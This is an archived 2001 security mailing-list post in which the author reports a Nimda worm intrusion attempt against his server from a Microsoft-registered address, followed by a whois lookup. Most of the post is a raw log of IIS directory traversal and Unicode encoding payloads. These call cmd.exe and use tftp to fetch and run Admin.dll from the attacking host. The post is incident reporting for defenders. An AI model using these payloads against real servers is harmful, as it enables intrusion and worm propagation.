Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Microsoft's Early Xmas Present.

From: "Jay D. Dyson" <jdyson () treachery net>
Date: Fri, 28 Dec 2001 18:11:23 -0800 (PST)
-----BEGIN PGP SIGNED MESSAGE-----

Hi folks,

        Normally I wouldn't be sending this out, but I figure folks need
to be aware and wary, considering the origin of this intrusion attempt.

        I received an early Xmas present from Microsoft.  No, I didn't get
XP, nor did I get the latest Office software suite.

        I got a Nimda intrusion attempt.

        Early Bird[1] picked up on this intrusion attempt and immediately
notified Microsoft.  I've yet to hear back from Microsoft as to why this
attack from their network came to pass[2].

        For those who are interested, here's the log excerpt. 

208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET 
/scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET 
/MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET 
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET 
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET 
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 
448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 
448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 
448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 
392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 469 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 
392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" 
"-"
208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 497 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
392 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 
200 449 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 
353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 
353 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
200 395 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 
200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 
200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 
200 452 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
391 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 
448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 
448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 
448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"

$ whois -h whois.arin.net 208.229.100.126

Microsoft Labs (NETBLK-UU-208-229-100-D1)
   One Microsoft Way
   Redmond, WA 98052
   US

   Netname: UU-208-229-100-D1
   Netblock: 208.229.100.0 - 208.229.101.255

   Coordinator:
      Steig, Rick  (RS8676-ARIN)  a-rickst () MICROSOFT COM
      (425) 703-3061

   Record last updated on 03-Nov-1997.
   Database last updated on  27-Dec-2001 19:55:32 EDT.

- -Jay

1.      http://www.treachery.net/earlybird/
2.      If anyone from Microsoft is reading this, I'd appreciate something
        more pleasant next holiday season.  (FYI, the machine you hit ran
        XP for only 15 seconds.  It now runs Linux.)

   (    (                                                        _______
   ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
 C|~~|C|~~| (>----- Jay D. Dyson -- jdyson () treachery net -----<) |    = |-'
  `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBPC0YPrlDRyqRQ2a9AQFXDAQAoXxjVbh6fTzpUPyQFB8aJGpxOLg/+Om+
1Zck8Fw7/tfKsq97YLSqSsp2r4Q5+ybQqXxdnbLVgVsPhKhazzXNrcPKWXhYQU8q
BYT1edg658tvKND0I5NeWoU+vzqzR0NPtppmBKCEMlwz+zG2Nz3nTzT7jMpzmxPo
uNDtpRKBcGs=
=9DpW
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: